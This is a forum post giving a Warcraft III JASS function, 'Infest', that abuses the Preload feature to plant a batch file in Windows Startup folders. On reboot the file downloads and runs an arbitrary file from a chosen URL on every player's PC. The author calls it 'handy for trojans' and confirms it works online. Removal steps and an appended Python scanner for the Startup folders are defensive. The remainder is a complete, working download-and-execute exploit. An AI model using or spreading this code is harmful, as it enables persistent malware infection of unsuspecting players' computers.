Jesus4Lyf
Made a post about it here, but hey...
This function is cool. For Windows 7, you must replace YOURUSERNAMEHERE with the username on the computer, but on XP this should be unnecessary (and so XP is particularly vulnerable). Just call the function from WC3. When you next restart your computer, the URL you specify will be downloaded to your startup folder as the name you specify, and called (the reason you specify the local filename is so Windows knows what file type to run it as).
If someone could test this online with a friend who has Windows XP and finds it to work, we can successfully say Blizzard needs to patch again. I mean, I'm sure the Russians will love it.
In case someone doesn't understand what this does, calling the function from any map will run the file specified on every player's PC on every boot from then onwards. Very handy for trojans and the like. :thup:
Let me know if this works on XP! I can't test it right now...
Edit: To remove infections, go to Start > Programs > Startup and delete the filename you used as "localname", or "myvirus.bat", depending on which is visible.
Edit: Tested on Windows XP, works online, serious threat.
JASS:
function Infest takes string url, string localname returns nothing
call PreloadGenClear()
call PreloadGenStart()
call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho If objFSO.Fileexists(\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.SaveToFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\nstart %TEMP%\\download.vbs\n//")
call PreloadGenEnd("C:\\Users\\YOURUSERNAMEHERE\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat")
call PreloadGenClear()
call PreloadGenStart()
call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho If objFSO.Fileexists(\"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.SaveToFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\necho objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
call Preload("\")\nstart %TEMP%\\download.vbs\n//")
call PreloadGenEnd("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat")
endfunction
//===========================================================================
function InitTrig_Melee_Initialization takes nothing returns nothing
call Infest("http://www.stephan-brenner.com/blog/wp-content/uploads/2008/08/donothing.zip", "myvirus.zip")
endfunction
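A defender-side check for the cleanup step in the post, as an added example that is not part of the original post: it scans the two Startup folders the JASS writes to and flags files carrying the strings that code emits. The function names, the `SAMPLE` text and the assumed on-disk layout of a Preload-generated file are constructed for illustration.

```python
import os
import re
from pathlib import Path

# Indicators copied from the strings in the JASS posted above.
INDICATORS = {
    "jass_preload_wrapper": re.compile(r"call\s+Preload\s*\(", re.I),
    "writes_temp_vbs": re.compile(r">>?\s*%TEMP%\\download\.vbs", re.I),
    "starts_temp_vbs": re.compile(r"^\s*start\s+%TEMP%\\download\.vbs", re.I | re.M),
    "http_download_object": re.compile(r"MSXML2\.XMLHTTP", re.I),
}

# Constructed sample of a Preload-generated file (layout is an assumption).
SAMPLE = (
    '\tcall Preload( "")\n'
    'echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") > %TEMP%\\download.vbs\n'
    '//" )\n'
    '\tcall Preload( "")\n'
    'start %TEMP%\\download.vbs\n'
    '//" )\n'
)

def match_indicators(text):
    """Return the sorted names of all indicators found in the file text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def is_suspicious(hits):
    """JASS wrapper lines never belong in Startup; else need write+start pair."""
    return ("jass_preload_wrapper" in hits
            or {"writes_temp_vbs", "starts_temp_vbs"} <= set(hits))

def startup_dirs(env=os.environ):
    """Startup folders named in the post: All Users (XP) and per-user (Win7)."""
    dirs = [Path(r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup")]
    if env.get("APPDATA"):
        dirs.append(Path(env["APPDATA"], "Microsoft", "Windows",
                         "Start Menu", "Programs", "Startup"))
    return dirs

def scan(dirs, max_bytes=1 << 20):
    """Map each suspicious file path to the indicators it matched."""
    findings = {}
    for folder in dirs:
        for path in (folder.iterdir() if folder.is_dir() else ()):
            if path.is_file() and path.stat().st_size <= max_bytes:
                hits = match_indicators(path.read_bytes().decode("latin-1"))
                if is_suspicious(hits):
                    findings[str(path)] = hits
    return findings
```

Run `scan(startup_dirs())` on the affected machine; a hit also means every other file in that Startup folder needs review, since the downloaded file is saved there under whatever "localname" was chosen.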